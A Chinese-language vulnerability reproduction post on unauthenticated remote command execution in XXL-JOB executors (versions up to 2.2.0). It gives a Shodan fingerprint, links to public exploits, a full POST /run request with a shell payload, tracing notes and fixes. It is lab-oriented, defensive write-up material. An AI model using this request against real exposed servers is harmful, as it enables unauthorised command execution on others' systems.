XXL-JOB API接口未授权访问漏洞复现

XXL-JOB API接口未授权访问漏洞复现

漏洞简述

XXL-JOB是一个轻量级分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。XXL-JOB分为admin和executor两端,前者为后台管理页面,后者是任务执行的客户端。executor默认没有配置认证,未授权的攻击者可以通过RESTful API执行任意命令。

漏洞影响版本

XXL-JOB <= 2.2.0

Shodan 搜索语法

invalid request, HttpMethod not support.

漏洞exp

https://github.com/OneSourceCat/XxlJob-Hessian-RCE

https://github.com/jas502n/xxl-job

漏洞环境搭建

使用vulhub进行复现,启动2.2.0版本的XXL-JOB。访问http://your-ip:8080即可查看到管理端(admin),访问http://your-ip:9999可以查看到客户端(executor)。

漏洞复现

向客户端(executor)发送如下数据包,即可执行命令。

POST /run HTTP/1.1
Host: your-ip:9999
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 365

{
  "jobId": 1,
  "executorHandler": "demoJobHandler",
  "executorParams": "demoJobHandler",
  "executorBlockStrategy": "COVER_EARLY",
  "executorTimeout": 0,
  "logId": 1,
  "logDateTime": 1586629003729,
  "glueType": "GLUE_SHELL",
  "glueSource": "touch /tmp/success",
  "glueUpdatetime": 1586699003758,
  "broadcastIndex": 0,
  "broadcastTotal": 0
}

命令执行成功。

低于2.2.0版本的XXL-JOB没有RESTful API,我们可以通过上面提供的exp来执行命令。

  • XxlJob<=2.1.2,需要利用Hessian触发。
  • XxlJob >= 2.2.0 会支持RESTFUL API,直接打公开的POC过去即可。

异常报错指纹

可以作为开始发现资产的一个特征。

溯源排查

日志位置:/var/log/xxl-job/

docker logs中也有执行记录,不过都没有记录ip。

修复方式

  • 升级XXL-JOB至最新版本。
  • 增加授权验证,配置 xxl.job.accessToken 防止未授权访问漏洞。
赞赏

微信赞赏支付宝赞赏

Zgao

愿有一日,安全圈的师傅们都能用上Zgao写的工具。

发表评论